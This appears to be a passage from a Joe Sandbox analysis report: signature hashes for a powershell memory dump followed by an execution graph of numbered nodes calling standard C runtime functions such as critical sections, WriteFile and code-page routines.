                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq$4'jq$$jq$$jq
                  • API String ID: 0-1496060811
                  • Opcode ID: a493b9dc9e41f06829158058d9925df2beea95ae273012db0bb99026b6b2a0dc
                  • Instruction ID: d8f1d0ece443649e0306c6177e513c3d78c0d5ef3405a7dc45d7487c046df938
                  • Opcode Fuzzy Hash: a493b9dc9e41f06829158058d9925df2beea95ae273012db0bb99026b6b2a0dc
                  • Instruction Fuzzy Hash: 04012BA174A3994FC72613281C302A66FB79FC359175A44ABC841DF697CC944C4A83A7

                  Execution Graph

                  Execution Coverage:2.7%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:3%
                  Total number of Nodes:1659
                  Total number of Limit Nodes:5
                  execution_graph 5995 240c220c 5996 240c221a dllmain_dispatch 5995->5996 5997 240c2215 5995->5997 5999 240c22b1 5997->5999 6000 240c22c7 5999->6000 6002 240c22d0 6000->6002 6003 240c2264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6000->6003 6002->5996 6003->6002 6423 240c724e GetProcessHeap 6424 240c284f 6425 240c2882 std::exception::exception 27 API calls 6424->6425 6426 240c285d 6425->6426 6427 240c5348 6428 240c3529 ___vcrt_uninitialize 8 API calls 6427->6428 6429 240c534f 6428->6429 6430 240c7b48 6440 240c8ebf 6430->6440 6434 240c7b55 6453 240c907c 6434->6453 6437 240c7b7f 6438 240c571e _free 20 API calls 6437->6438 6439 240c7b8a 6438->6439 6457 240c8ec8 6440->6457 6442 240c7b50 6443 240c8fdc 6442->6443 6444 240c8fe8 ___DestructExceptionObject 6443->6444 6477 240c5671 RtlEnterCriticalSection 6444->6477 6446 240c905e 6491 240c9073 6446->6491 6448 240c8ff3 6448->6446 6449 240c9032 RtlDeleteCriticalSection 6448->6449 6478 240ca09c 6448->6478 6450 240c571e _free 20 API calls 6449->6450 6450->6448 6452 240c906a _abort 6452->6434 6454 240c7b64 RtlDeleteCriticalSection 6453->6454 6455 240c9092 6453->6455 6454->6434 6454->6437 6455->6454 6456 240c571e _free 20 API calls 6455->6456 6456->6454 6458 240c8ed4 ___DestructExceptionObject 6457->6458 6467 240c5671 RtlEnterCriticalSection 6458->6467 6460 240c8f77 6472 240c8f97 6460->6472 6463 240c8f83 _abort 6463->6442 6465 240c8e78 66 API calls 6466 240c8ee3 6465->6466 6466->6460 6466->6465 6468 240c7b94 RtlEnterCriticalSection 6466->6468 6469 240c8f6d 6466->6469 6467->6466 6468->6466 6475 240c7ba8 RtlLeaveCriticalSection 6469->6475 6471 240c8f75 6471->6466 6476 240c56b9 RtlLeaveCriticalSection 6472->6476 6474 240c8f9e 6474->6463 6475->6471 6476->6474 6477->6448 6479 240ca0a8 ___DestructExceptionObject 6478->6479 6480 240ca0ce 6479->6480 6481 240ca0b9 6479->6481 6490 240ca0c9 _abort 6480->6490 6494 240c7b94 RtlEnterCriticalSection 6480->6494 6482 240c6368 _free 20 API calls 6481->6482 6483 240ca0be 6482->6483 6485 240c62ac _abort 26 API calls 6483->6485 6485->6490 6486 240ca0ea 6495 240ca026 6486->6495 6488 240ca0f5 6511 240ca112 6488->6511 6490->6448 6775 240c56b9 RtlLeaveCriticalSection 6491->6775 6493 240c907a 6493->6452 6494->6486 6496 240ca048 6495->6496 6497 240ca033 6495->6497 6503 240ca043 6496->6503 6514 240c8e12 6496->6514 6498 240c6368 _free 20 API calls 6497->6498 6500 240ca038 6498->6500 6502 240c62ac _abort 26 API calls 6500->6502 6502->6503 6503->6488 6504 240c907c 20 API calls 6505 240ca064 6504->6505 6520 240c7a5a 6505->6520 6507 240ca06a 6527 240cadce 6507->6527 6510 240c571e _free 20 API calls 6510->6503 6774 240c7ba8 RtlLeaveCriticalSection 6511->6774 6513 240ca11a 6513->6490 6515 240c8e26 6514->6515 6516 240c8e2a 6514->6516 6515->6504 6516->6515 6517 240c7a5a 26 API calls 6516->6517 6518 240c8e4a 6517->6518 6542 240c9a22 6518->6542 6521 240c7a7b 6520->6521 6522 240c7a66 6520->6522 6521->6507 6523 240c6368 _free 20 API calls 6522->6523 6524 240c7a6b 6523->6524 6525 240c62ac _abort 26 API calls 6524->6525 6526 240c7a76 6525->6526 6526->6507 6528 240caddd 6527->6528 6529 240cadf2 6527->6529 6531 240c6355 __dosmaperr 20 API calls 6528->6531 6530 240cae2d 6529->6530 6535 240cae19 6529->6535 6532 240c6355 __dosmaperr 20 API calls 6530->6532 6533 240cade2 6531->6533 6536 240cae32 6532->6536 6534 240c6368 _free 20 API calls 6533->6534 6539 240ca070 6534->6539 6731 240cada6 6535->6731 6538 240c6368 _free 20 API calls 6536->6538 6540 240cae3a 6538->6540 6539->6503 6539->6510 6541 240c62ac _abort 26 API calls 6540->6541 6541->6539 6543 240c9a2e ___DestructExceptionObject 6542->6543 6544 240c9a4e 6543->6544 6545 240c9a36 6543->6545 6547 240c9aec 6544->6547 6552 240c9a83 6544->6552 6567 240c6355 6545->6567 6549 240c6355 __dosmaperr 20 API calls 6547->6549 6551 240c9af1 6549->6551 6550 240c6368 _free 20 API calls 6561 240c9a43 _abort 6550->6561 6553 240c6368 _free 20 API calls 6551->6553 6570 240c8c7b RtlEnterCriticalSection 6552->6570 6555 240c9af9 6553->6555 6557 240c62ac _abort 26 API calls 6555->6557 6556 240c9a89 6558 240c9aba 6556->6558 6559 240c9aa5 6556->6559 6557->6561 6571 240c9b0d 6558->6571 6560 240c6368 _free 20 API calls 6559->6560 6563 240c9aaa 6560->6563 6561->6515 6565 240c6355 __dosmaperr 20 API calls 6563->6565 6564 240c9ab5 6622 240c9ae4 6564->6622 6565->6564 6568 240c5b7a __dosmaperr 20 API calls 6567->6568 6569 240c635a 6568->6569 6569->6550 6570->6556 6572 240c9b3b 6571->6572 6610 240c9b34 6571->6610 6573 240c9b3f 6572->6573 6576 240c9b5e 6572->6576 6575 240c6355 __dosmaperr 20 API calls 6573->6575 6574 240c2ada _ValidateLocalCookies 5 API calls 6579 240c9d15 6574->6579 6580 240c9b44 6575->6580 6577 240c9baf 6576->6577 6578 240c9b92 6576->6578 6583 240c9bc5 6577->6583 6625 240ca00b 6577->6625 6581 240c6355 __dosmaperr 20 API calls 6578->6581 6579->6564 6582 240c6368 _free 20 API calls 6580->6582 6584 240c9b97 6581->6584 6585 240c9b4b 6582->6585 6628 240c96b2 6583->6628 6588 240c6368 _free 20 API calls 6584->6588 6589 240c62ac _abort 26 API calls 6585->6589 6591 240c9b9f 6588->6591 6589->6610 6596 240c62ac _abort 26 API calls 6591->6596 6592 240c9c0c 6597 240c9c66 WriteFile 6592->6597 6598 240c9c20 6592->6598 6593 240c9bd3 6594 240c9bf9 6593->6594 6595 240c9bd7 6593->6595 6640 240c9492 GetConsoleCP 6594->6640 6599 240c9ccd 6595->6599 6635 240c9645 6595->6635 6596->6610 6601 240c9c89 GetLastError 6597->6601 6606 240c9bef 6597->6606 6602 240c9c28 6598->6602 6603 240c9c56 6598->6603 6599->6610 6611 240c6368 _free 20 API calls 6599->6611 6601->6606 6607 240c9c2d 6602->6607 6608 240c9c46 6602->6608 6666 240c9728 6603->6666 6606->6599 6606->6610 6613 240c9ca9 6606->6613 6607->6599 6651 240c9807 6607->6651 6658 240c98f5 6608->6658 6610->6574 6612 240c9cf2 6611->6612 6615 240c6355 __dosmaperr 20 API calls 6612->6615 6616 240c9cc4 6613->6616 6617 240c9cb0 6613->6617 6615->6610 6673 240c6332 6616->6673 6619 240c6368 _free 20 API calls 6617->6619 6620 240c9cb5 6619->6620 6621 240c6355 __dosmaperr 20 API calls 6620->6621 6621->6610 6730 240c8c9e RtlLeaveCriticalSection 6622->6730 6624 240c9aea 6624->6561 6678 240c9f8d 6625->6678 6700 240c8dbc 6628->6700 6630 240c96c7 6630->6592 6630->6593 6631 240c96c2 6631->6630 6632 240c5af6 _abort 38 API calls 6631->6632 6633 240c96ea 6632->6633 6633->6630 6634 240c9708 GetConsoleMode 6633->6634 6634->6630 6636 240c969f 6635->6636 6639 240c966a 6635->6639 6636->6606 6637 240ca181 WriteConsoleW CreateFileW 6637->6639 6638 240c96a1 GetLastError 6638->6636 6639->6636 6639->6637 6639->6638 6644 240c94f5 6640->6644 6650 240c9607 6640->6650 6641 240c2ada _ValidateLocalCookies 5 API calls 6642 240c9641 6641->6642 6642->6606 6645 240c957b WideCharToMultiByte 6644->6645 6647 240c79e6 40 API calls __fassign 6644->6647 6649 240c95d2 WriteFile 6644->6649 6644->6650 6709 240c7c19 6644->6709 6646 240c95a1 WriteFile 6645->6646 6645->6650 6646->6644 6648 240c962a GetLastError 6646->6648 6647->6644 6648->6650 6649->6644 6649->6648 6650->6641 6656 240c9816 6651->6656 6652 240c98d8 6653 240c2ada _ValidateLocalCookies 5 API calls 6652->6653 6657 240c98f1 6653->6657 6654 240c9894 WriteFile 6655 240c98da GetLastError 6654->6655 6654->6656 6655->6652 6656->6652 6656->6654 6657->6606 6663 240c9904 6658->6663 6659 240c9a0f 6660 240c2ada _ValidateLocalCookies 5 API calls 6659->6660 6662 240c9a1e 6660->6662 6661 240c9986 WideCharToMultiByte 6664 240c99bb WriteFile 6661->6664 6665 240c9a07 GetLastError 6661->6665 6662->6606 6663->6659 6663->6661 6663->6664 6664->6663 6664->6665 6665->6659 6671 240c9737 6666->6671 6667 240c97ea 6668 240c2ada _ValidateLocalCookies 5 API calls 6667->6668 6670 240c9803 6668->6670 6669 240c97a9 WriteFile 6669->6671 6672 240c97ec GetLastError 6669->6672 6670->6606 6671->6667 6671->6669 6672->6667 6674 240c6355 __dosmaperr 20 API calls 6673->6674 6675 240c633d _free 6674->6675 6676 240c6368 _free 20 API calls 6675->6676 6677 240c6350 6676->6677 6677->6610 6687 240c8d52 6678->6687 6680 240c9f9f 6681 240c9fb8 SetFilePointerEx 6680->6681 6682 240c9fa7 6680->6682 6684 240c9fac 6681->6684 6685 240c9fd0 GetLastError 6681->6685 6683 240c6368 _free 20 API calls 6682->6683 6683->6684 6684->6583 6686 240c6332 __dosmaperr 20 API calls 6685->6686 6686->6684 6688 240c8d5f 6687->6688 6689 240c8d74 6687->6689 6690 240c6355 __dosmaperr 20 API calls 6688->6690 6692 240c6355 __dosmaperr 20 API calls 6689->6692 6694 240c8d99 6689->6694 6691 240c8d64 6690->6691 6693 240c6368 _free 20 API calls 6691->6693 6695 240c8da4 6692->6695 6696 240c8d6c 6693->6696 6694->6680 6697 240c6368 _free 20 API calls 6695->6697 6696->6680 6698 240c8dac 6697->6698 6699 240c62ac _abort 26 API calls 6698->6699 6699->6696 6701 240c8dc9 6700->6701 6702 240c8dd6 6700->6702 6703 240c6368 _free 20 API calls 6701->6703 6705 240c8de2 6702->6705 6706 240c6368 _free 20 API calls 6702->6706 6704 240c8dce 6703->6704 6704->6631 6705->6631 6707 240c8e03 6706->6707 6708 240c62ac _abort 26 API calls 6707->6708 6708->6704 6710 240c5af6 _abort 38 API calls 6709->6710 6711 240c7c24 6710->6711 6714 240c7a00 6711->6714 6715 240c7a28 6714->6715 6716 240c7a13 6714->6716 6715->6644 6716->6715 6718 240c7f0f 6716->6718 6719 240c7f1b ___DestructExceptionObject 6718->6719 6720 240c5af6 _abort 38 API calls 6719->6720 6721 240c7f24 6720->6721 6722 240c7f72 _abort 6721->6722 6723 240c5671 _abort RtlEnterCriticalSection 6721->6723 6722->6715 6724 240c7f42 6723->6724 6725 240c7f86 __fassign 20 API calls 6724->6725 6726 240c7f56 6725->6726 6727 240c7f75 __fassign RtlLeaveCriticalSection 6726->6727 6728 240c7f69 6727->6728 6728->6722 6729 240c55a8 _abort 38 API calls 6728->6729 6729->6722 6730->6624 6734 240cad24 6731->6734 6733 240cadca 6733->6539 6735 240cad30 ___DestructExceptionObject 6734->6735 6745 240c8c7b RtlEnterCriticalSection 6735->6745 6737 240cad3e 6738 240cad65 6737->6738 6739 240cad70 6737->6739 6746 240cae4d 6738->6746 6741 240c6368 _free 20 API calls 6739->6741 6742 240cad6b 6741->6742 6761 240cad9a 6742->6761 6744 240cad8d _abort 6744->6733 6745->6737 6747 240c8d52 26 API calls 6746->6747 6749 240cae5d 6747->6749 6748 240cae63 6764 240c8cc1 6748->6764 6749->6748 6750 240cae95 6749->6750 6753 240c8d52 26 API calls 6749->6753 6750->6748 6754 240c8d52 26 API calls 6750->6754 6756 240cae8c 6753->6756 6757 240caea1 CloseHandle 6754->6757 6755 240caedd 6755->6742 6759 240c8d52 26 API calls 6756->6759 6757->6748 6760 240caead GetLastError 6757->6760 6758 240c6332 __dosmaperr 20 API calls 6758->6755 6759->6750 6760->6748 6773 240c8c9e RtlLeaveCriticalSection 6761->6773 6763 240cada4 6763->6744 6765 240c8d37 6764->6765 6766 240c8cd0 6764->6766 6767 240c6368 _free 20 API calls 6765->6767 6766->6765 6772 240c8cfa 6766->6772 6768 240c8d3c 6767->6768 6769 240c6355 __dosmaperr 20 API calls 6768->6769 6770 240c8d27 6769->6770 6770->6755 6770->6758 6771 240c8d21 SetStdHandle 6771->6770 6772->6770 6772->6771 6773->6763 6774->6513 6775->6493 6776 240c2049 6777 240c2055 ___DestructExceptionObject 6776->6777 6778 240c207d 6777->6778 6779 240c20d3 6777->6779 6789 240c205e 6777->6789 6790 240c244c 6778->6790 6780 240c2639 ___scrt_fastfail 4 API calls 6779->6780 6782 240c20da 6780->6782 6783 240c2082 6799 240c2308 6783->6799 6785 240c2087 __RTC_Initialize 6802 240c20c4 6785->6802 6787 240c209f 6805 240c260b 6787->6805 6791 240c2451 ___scrt_release_startup_lock 6790->6791 6792 240c2455 6791->6792 6796 240c2461 6791->6796 6793 240c527a _abort 20 API calls 6792->6793 6794 240c245f 6793->6794 6794->6783 6795 240c246e 6795->6783 6796->6795 6797 240c499b _abort 28 API calls 6796->6797 6798 240c4bbd 6797->6798 6798->6783 6811 240c34c7 RtlInterlockedFlushSList 6799->6811 6801 240c2312 6801->6785 6813 240c246f 6802->6813 6804 240c20c9 ___scrt_release_startup_lock 6804->6787 6806 240c2617 6805->6806 6807 240c262d 6806->6807 6832 240c53ed 6806->6832 6807->6789 6810 240c3529 ___vcrt_uninitialize 8 API calls 6810->6807 6812 240c34d7 6811->6812 6812->6801 6818 240c53ff 6813->6818 6816 240c391b ___vcrt_uninitialize_ptd 6 API calls 6817 240c354d 6816->6817 6817->6804 6821 240c5c2b 6818->6821 6822 240c5c35 6821->6822 6823 240c2476 6821->6823 6825 240c5db2 6822->6825 6823->6816 6826 240c5c45 __dosmaperr 5 API calls 6825->6826 6827 240c5dd9 6826->6827 6828 240c5df1 TlsFree 6827->6828 6829 240c5de5 6827->6829 6828->6829 6830 240c2ada _ValidateLocalCookies 5 API calls 6829->6830 6831 240c5e02 6830->6831 6831->6823 6835 240c74da 6832->6835 6837 240c74f3 6835->6837 6836 240c2ada _ValidateLocalCookies 5 API calls 6838 240c2625 6836->6838 6837->6836 6838->6810 7003 240c8a89 7006 240c6d60 7003->7006 7007 240c6d69 7006->7007 7008 240c6d72 7006->7008 7010 240c6c5f 7007->7010 7011 240c5af6 _abort 38 API calls 7010->7011 7012 240c6c6c 7011->7012 7013 240c6d7e __fassign 38 API calls 7012->7013 7014 240c6c74 7013->7014 7030 240c69f3 7014->7030 7021 240c571e _free 20 API calls 7023 240c6c8b 7021->7023 7022 240c6cc9 7024 240c6368 _free 20 API calls 7022->7024 7023->7008 7029 240c6cce 7024->7029 7025 240c6d12 7025->7029 7054 240c68c9 7025->7054 7026 240c6ce6 7026->7025 7027 240c571e _free 20 API calls 7026->7027 7027->7025 7029->7021 7031 240c54a7 __fassign 38 API calls 7030->7031 7032 240c6a05 7031->7032 7033 240c6a14 GetOEMCP 7032->7033 7034 240c6a26 7032->7034 7035 240c6a3d 7033->7035 7034->7035 7036 240c6a2b GetACP 7034->7036 7035->7023 7037 240c56d0 7035->7037 7036->7035 7038 240c570e 7037->7038 7042 240c56de __dosmaperr 7037->7042 7039 240c6368 _free 20 API calls 7038->7039 7041 240c570c 7039->7041 7040 240c56f9 RtlAllocateHeap 7040->7041 7040->7042 7041->7029 7044 240c6e20 7041->7044 7042->7038 7042->7040 7043 240c474f __dosmaperr 7 API calls 7042->7043 7043->7042 7045 240c69f3 40 API calls 7044->7045 7046 240c6e3f 7045->7046 7049 240c6e90 IsValidCodePage 7046->7049 7051 240c6e46 7046->7051 7053 240c6eb5 ___scrt_fastfail 7046->7053 7047 240c2ada _ValidateLocalCookies 5 API calls 7048 240c6cc1 7047->7048 7048->7022 7048->7026 7050 240c6ea2 GetCPInfo 7049->7050 7049->7051 7050->7051 7050->7053 7051->7047 7057 240c6acb GetCPInfo 7053->7057 7130 240c6886 7054->7130 7056 240c68ed 7056->7029 7058 240c6baf 7057->7058 7063 240c6b05 7057->7063 7060 240c2ada _ValidateLocalCookies 5 API calls 7058->7060 7062 240c6c5b 7060->7062 7062->7051 7067 240c86e4 7063->7067 7066 240c8a3e 43 API calls 7066->7058 7068 240c54a7 __fassign 38 API calls 7067->7068 7069 240c8704 MultiByteToWideChar 7068->7069 7071 240c87da 7069->7071 7072 240c8742 7069->7072 7073 240c2ada _ValidateLocalCookies 5 API calls 7071->7073 7074 240c8763 ___scrt_fastfail 7072->7074 7076 240c56d0 21 API calls 7072->7076 7077 240c6b66 7073->7077 7075 240c87d4 7074->7075 7079 240c87a8 MultiByteToWideChar 7074->7079 7086 240c8801 7075->7086 7076->7074 7081 240c8a3e 7077->7081 7079->7075 7080 240c87c4 GetStringTypeW 7079->7080 7080->7075 7082 240c54a7 __fassign 38 API calls 7081->7082 7083 240c8a51 7082->7083 7090 240c8821 7083->7090 7087 240c881e 7086->7087 7088 240c880d 7086->7088 7087->7071 7088->7087 7089 240c571e _free 20 API calls 7088->7089 7089->7087 7091 240c883c 7090->7091 7092 240c8862 MultiByteToWideChar 7091->7092 7093 240c888c 7092->7093 7094 240c8a16 7092->7094 7099 240c56d0 21 API calls 7093->7099 7101 240c88ad 7093->7101 7095 240c2ada _ValidateLocalCookies 5 API calls 7094->7095 7096 240c6b87 7095->7096 7096->7066 7097 240c8962 7103 240c8801 __freea 20 API calls 7097->7103 7098 240c88f6 MultiByteToWideChar 7098->7097 7100 240c890f 7098->7100 7099->7101 7117 240c5f19 7100->7117 7101->7097 7101->7098 7103->7094 7105 240c8939 7105->7097 7109 240c5f19 11 API calls 7105->7109 7106 240c8971 7107 240c56d0 21 API calls 7106->7107 7111 240c8992 7106->7111 7107->7111 7108 240c8a07 7110 240c8801 __freea 20 API calls 7108->7110 7109->7097 7110->7097 7111->7108 7112 240c5f19 11 API calls 7111->7112 7113 240c89e6 7112->7113 7113->7108 7114 240c89f5 WideCharToMultiByte 7113->7114 7114->7108 7115 240c8a35 7114->7115 7116 240c8801 __freea 20 API calls 7115->7116 7116->7097 7118 240c5c45 __dosmaperr 5 API calls 7117->7118 7119 240c5f40 7118->7119 7122 240c5f49 7119->7122 7125 240c5fa1 7119->7125 7123 240c2ada _ValidateLocalCookies 5 API calls 7122->7123 7124 240c5f9b 7123->7124 7124->7097 7124->7105 7124->7106 7126 240c5c45 __dosmaperr 5 API calls 7125->7126 7127 240c5fc8 7126->7127 7128 240c2ada _ValidateLocalCookies 5 API calls 7127->7128 7129 240c5f89 LCMapStringW 7128->7129 7129->7122 7131 240c6892 ___DestructExceptionObject 7130->7131 7138 240c5671 RtlEnterCriticalSection 7131->7138 7133 240c689c 7139 240c68f1 7133->7139 7137 240c68b5 _abort 7137->7056 7138->7133 7151 240c7011 7139->7151 7141 240c693f 7142 240c7011 26 API calls 7141->7142 7143 240c695b 7142->7143 7144 240c7011 26 API calls 7143->7144 7145 240c6979 7144->7145 7146 240c68a9 7145->7146 7147 240c571e _free 20 API calls 7145->7147 7148 240c68bd 7146->7148 7147->7146 7165 240c56b9 RtlLeaveCriticalSection 7148->7165 7150 240c68c7 7150->7137 7152 240c7022 7151->7152 7161 240c701e 7151->7161 7153 240c7029 7152->7153 7156 240c703c ___scrt_fastfail 7152->7156 7154 240c6368 _free 20 API calls 7153->7154 7155 240c702e 7154->7155 7157 240c62ac _abort 26 API calls 7155->7157 7158 240c706a 7156->7158 7159 240c7073 7156->7159 7156->7161 7157->7161 7160 240c6368 _free 20 API calls 7158->7160 7159->7161 7163 240c6368 _free 20 API calls 7159->7163 7162 240c706f 7160->7162 7161->7141 7164 240c62ac _abort 26 API calls 7162->7164 7163->7162 7164->7161 7165->7150 6839 240ca945 6840 240ca96d 6839->6840 6841 240ca9a5 6840->6841 6842 240ca99e 6840->6842 6843 240ca997 6840->6843 6852 240caa00 6842->6852 6848 240caa17 6843->6848 6849 240caa20 6848->6849 6856 240cb19b 6849->6856 6853 240caa20 6852->6853 6854 240cb19b __startOneArgErrorHandling 21 API calls 6853->6854 6855 240ca9a3 6854->6855 6857 240cb1da __startOneArgErrorHandling 6856->6857 6862 240cb25c __startOneArgErrorHandling 6857->6862 6866 240cb59e 6857->6866 6859 240cb286 6861 240cb292 6859->6861 6873 240cb8b2 6859->6873 6864 240c2ada _ValidateLocalCookies 5 API calls 6861->6864 6862->6859 6869 240c78a3 6862->6869 6865 240ca99c 6864->6865 6880 240cb5c1 6866->6880 6870 240c78cb 6869->6870 6871 240c2ada _ValidateLocalCookies 5 API calls 6870->6871 6872 240c78e8 6871->6872 6872->6859 6874 240cb8d4 6873->6874 6877 240cb8bf 6873->6877 6875 240c6368 _free 20 API calls 6874->6875 6876 240cb8d9 6875->6876 6876->6861 6877->6876 6878 240c6368 _free 20 API calls 6877->6878 6879 240cb8cc 6878->6879 6879->6861 6881 240cb5ec __raise_exc 6880->6881 6882 240cb7e5 RaiseException 6881->6882 6883 240cb5bc 6882->6883 6883->6862 7276 240ca1c6 IsProcessorFeaturePresent 7277 240c7bc7 7278 240c7bd3 ___DestructExceptionObject 7277->7278 7280 240c7c0a _abort 7278->7280 7285 240c5671 RtlEnterCriticalSection 7278->7285 7281 240c7be7 7286 240c7f86 7281->7286 7285->7281 7287 240c7f94 __fassign 7286->7287 7289 240c7bf7 7286->7289 7287->7289 7293 240c7cc2 7287->7293 7290 240c7c10 7289->7290 7407 240c56b9 RtlLeaveCriticalSection 7290->7407 7292 240c7c17 7292->7280 7294 240c7d42 7293->7294 7297 240c7cd8 7293->7297 7296 240c571e _free 20 API calls 7294->7296 7320 240c7d90 7294->7320 7299 240c7d64 7296->7299 7297->7294 7298 240c7d0b 7297->7298 7301 240c571e _free 20 API calls 7297->7301 7307 240c571e _free 20 API calls 7298->7307 7319 240c7d2d 7298->7319 7300 240c571e _free 20 API calls 7299->7300 7302 240c7d77 7300->7302 7306 240c7d00 7301->7306 7308 240c571e _free 20 API calls 7302->7308 7303 240c571e _free 20 API calls 7309 240c7d37 7303->7309 7304 240c7dfe 7311 240c571e _free 20 API calls 7304->7311 7305 240c7d9e 7305->7304 7312 240c571e 20 API calls _free 7305->7312 7321 240c90ba 7306->7321 7314 240c7d22 7307->7314 7315 240c7d85 7308->7315 7310 240c571e _free 20 API calls 7309->7310 7310->7294 7316 240c7e04 7311->7316 7312->7305 7349 240c91b8 7314->7349 7318 240c571e _free 20 API calls 7315->7318 7316->7289 7318->7320 7319->7303 7361 240c7e35 7320->7361 7322 240c90cb 7321->7322 7348 240c91b4 7321->7348 7323 240c90dc 7322->7323 7324 240c571e _free 20 API calls 7322->7324 7325 240c90ee 7323->7325 7326 240c571e _free 20 API calls 7323->7326 7324->7323 7327 240c9100 7325->7327 7328 240c571e _free 20 API calls 7325->7328 7326->7325 7329 240c9112 7327->7329 7330 240c571e _free 20 API calls 7327->7330 7328->7327 7331 240c9124 7329->7331 7332 240c571e _free 20 API calls 7329->7332 7330->7329 7333 240c9136 7331->7333 7334 240c571e _free 20 API calls 7331->7334 7332->7331 7335 240c571e _free 20 API calls 7333->7335 7339 240c9148 7333->7339 7334->7333 7335->7339 7336 240c571e _free 20 API calls 7338 240c915a 7336->7338 7337 240c916c 7341 240c917e 7337->7341 7342 240c571e _free 20 API calls 7337->7342 7338->7337 7340 240c571e _free 20 API calls 7338->7340 7339->7336 7339->7338 7340->7337 7343 240c9190 7341->7343 7344 240c571e _free 20 API calls 7341->7344 7342->7341 7345 240c91a2 7343->7345 7346 240c571e _free 20 API calls 7343->7346 7344->7343 7347 240c571e _free 20 API calls 7345->7347 7345->7348 7346->7345 7347->7348 7348->7298 7350 240c921d 7349->7350 7351 240c91c5 7349->7351 7350->7319 7352 240c91d5 7351->7352 7353 240c571e _free 20 API calls 7351->7353 7354 240c91e7 7352->7354 7355 240c571e _free 20 API calls 7352->7355 7353->7352 7356 240c91f9 7354->7356 7358 240c571e _free 20 API calls 7354->7358 7355->7354 7357 240c920b 7356->7357 7359 240c571e _free 20 API calls 7356->7359 7357->7350 7360 240c571e _free 20 API calls 7357->7360 7358->7356 7359->7357 7360->7350 7362 240c7e42 7361->7362 7366 240c7e60 7361->7366 7362->7366 7367 240c925d 7362->7367 7365 240c571e _free 20 API calls 7365->7366 7366->7305 7368 240c7e5a 7367->7368 7369 240c926e 7367->7369 7368->7365 7403 240c9221 7369->7403 7372 240c9221 __fassign 20 API calls 7373 240c9281 7372->7373 7374 240c9221 __fassign 20 API calls 7373->7374 7375 240c928c 7374->7375 7376 240c9221 __fassign 20 API calls 7375->7376 7377 240c9297 7376->7377 7378 240c9221 __fassign 20 API calls 7377->7378 7379 240c92a5 7378->7379 7380 240c571e _free 20 API calls 7379->7380 7381 240c92b0 7380->7381 7382 240c571e _free 20 API calls 7381->7382 7383 240c92bb 7382->7383 7384 240c571e _free 20 API calls 7383->7384 7385 240c92c6 7384->7385 7386 240c9221 __fassign 20 API calls 7385->7386 7387 240c92d4 7386->7387 7388 240c9221 __fassign 20 API calls 7387->7388 7389 240c92e2 7388->7389 7390 240c9221 __fassign 20 API calls 7389->7390 7391 240c92f3 7390->7391 7392 240c9221 __fassign 20 API calls 7391->7392 7393 240c9301 7392->7393 7394 240c9221 __fassign 20 API calls 7393->7394 7395 240c930f 7394->7395 7396 240c571e _free 20 API calls 7395->7396 7397 240c931a 7396->7397 7398 240c571e _free 20 API calls 7397->7398 7399 240c9325 7398->7399 7400 240c571e _free 20 API calls 7399->7400 7401 240c9330 7400->7401 7402 240c571e _free 20 API calls 7401->7402 7402->7368 7404 240c9258 7403->7404 7405 240c9248 7403->7405 7404->7372 7405->7404 7406 240c571e _free 20 API calls 7405->7406 7406->7405 7407->7292 6884 240c8640 6887 240c8657 6884->6887 6888 240c8679 6887->6888 6889 240c8665 6887->6889 6890 240c8681 6888->6890 6891 240c8693 6888->6891 6892 240c6368 _free 20 API calls 6889->6892 6893 240c6368 _free 20 API calls 6890->6893 6899 240c8652 6891->6899 6900 240c54a7 6891->6900 6894 240c866a 6892->6894 6895 240c8686 6893->6895 6897 240c62ac _abort 26 API calls 6894->6897 6898 240c62ac _abort 26 API calls 6895->6898 6897->6899 6898->6899 6901 240c54ba 6900->6901 6902 240c54c4 6900->6902 6901->6899 6902->6901 6903 240c5af6 _abort 38 API calls 6902->6903 6904 240c54e5 6903->6904 6905 240c7a00 __fassign 38 API calls 6904->6905 6906 240c54fe 6905->6906 6908 240c7a2d 6906->6908 6909 240c7a40 6908->6909 6911 240c7a55 6908->6911 6909->6911 6912 240c6d7e 6909->6912 6911->6901 6913 240c6d8a ___DestructExceptionObject 6912->6913 6914 240c5af6 _abort 38 API calls 6913->6914 6919 240c6d94 6914->6919 6916 240c6e18 _abort 6916->6911 6918 240c55a8 _abort 38 API calls 6918->6919 6919->6916 6919->6918 6920 240c571e _free 20 API calls 6919->6920 6921 240c5671 RtlEnterCriticalSection 6919->6921 6922 240c6e0f 6919->6922 6920->6919 6921->6919 6925 240c56b9 RtlLeaveCriticalSection 6922->6925 6924 240c6e16 6924->6919 6925->6924 7170 240c7a80 7171 240c7a8d 7170->7171 7172 240c637b __dosmaperr 20 API calls 7171->7172 7173 240c7aa7 7172->7173 7174 240c571e _free 20 API calls 7173->7174 7175 240c7ab3 7174->7175 7176 240c7ad9 7175->7176 7177 240c637b __dosmaperr 20 API calls 7175->7177 7179 240c5eb7 11 API calls 7176->7179 7181 240c7ae5 7176->7181 7182 240c7b43 7176->7182 7178 240c7acd 7177->7178 7180 240c571e _free 20 API calls 7178->7180 7179->7176 7180->7176 6004 240c7103 GetCommandLineA GetCommandLineW 6005 240c5303 6008 240c50a5 6005->6008 6017 240c502f 6008->6017 6011 240c502f 5 API calls 6012 240c50c3 6011->6012 6021 240c5000 6012->6021 6015 240c5000 20 API calls 6016 240c50d9 6015->6016 6018 240c5048 6017->6018 6019 240c2ada _ValidateLocalCookies 5 API calls 6018->6019 6020 240c5069 6019->6020 6020->6011 6022 240c502a 6021->6022 6023 240c500d 6021->6023 6022->6015 6024 240c5024 6023->6024 6025 240c571e _free 20 API calls 6023->6025 6026 240c571e _free 20 API calls 6024->6026 6025->6023 6026->6022 6926 240caf43 6927 240caf4d 6926->6927 6928 240caf59 6926->6928 6927->6928 6929 240caf52 CloseHandle 6927->6929 6929->6928 6027 240c281c 6030 240c2882 6027->6030 6033 240c3550 6030->6033 6032 240c282a 6034 240c358a 6033->6034 6035 240c355d 6033->6035 6034->6032 6035->6034 6036 240c47e5 ___std_exception_copy 21 API calls 6035->6036 6037 240c357a 6036->6037 6037->6034 6039 240c544d 6037->6039 6040 240c545a 6039->6040 6041 240c5468 6039->6041 6040->6041 6043 240c547f 6040->6043 6042 240c6368 _free 20 API calls 6041->6042 6047 240c5470 6042->6047 6045 240c547a 6043->6045 6046 240c6368 _free 20 API calls 6043->6046 